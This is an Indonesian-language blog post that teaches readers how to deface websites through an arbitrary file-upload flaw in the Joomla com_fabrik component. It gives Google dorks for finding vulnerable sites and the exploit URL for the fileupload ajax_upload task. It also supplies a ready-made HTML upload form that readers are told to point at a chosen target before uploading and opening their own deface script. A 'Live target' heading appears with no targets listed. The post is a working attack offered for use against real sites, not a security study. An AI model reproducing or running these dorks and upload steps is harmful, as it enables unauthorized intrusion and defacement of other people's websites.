Cara Deface Poc Com_fabrik(new method)+Live target

Pepes muluu:V


Halo² guys ,asalamualaikum wr wb. Kali ini gw akan tutor pepes lagi poc com_fabrik (new method) ya jadi simak baik² aja tutornya: )
Bahan²nya:

-Dork
inurl:index.php?option=com_fabrik
inurl:index.php/component/fabrik/ site:com
inurl:index.php?option=com_fabrik&view= site:com
inurl:importcsv.php site:com
inurl:viewTable?cid= site:com

-Exploit
index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

-Csrf
<form method="POST" action="http://targetlu.co.li/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" enctype="multipart/form-data"> <input type="file" name="file" /> <button> Upload </button> </form>

Note:warna merah ganti degan target lo

-Sc Depes

Ok guys klo semua udh ada tinggal aksi aja nih: )

1.lu nge dork pake salah satu dork diatas di gugel, nah tinggal pilih aja web yg mau di eue




Ciri² vuln seperti kyk gambar di bawah ini


3.copy csrf tersebut simpan dengan format.html

4.tinggal upload sc aja deh: ), sebenernya dengan cara ini bisa ditebas juga tapi gw males nulisnya hehehe

5.Cara aksesnya masukin nama sc lu dibelakangnya
Gimana mudah kan: )

Live target:

Sekian dari gw wasalamualaikum wr wb.


Post a Comment

0 Comments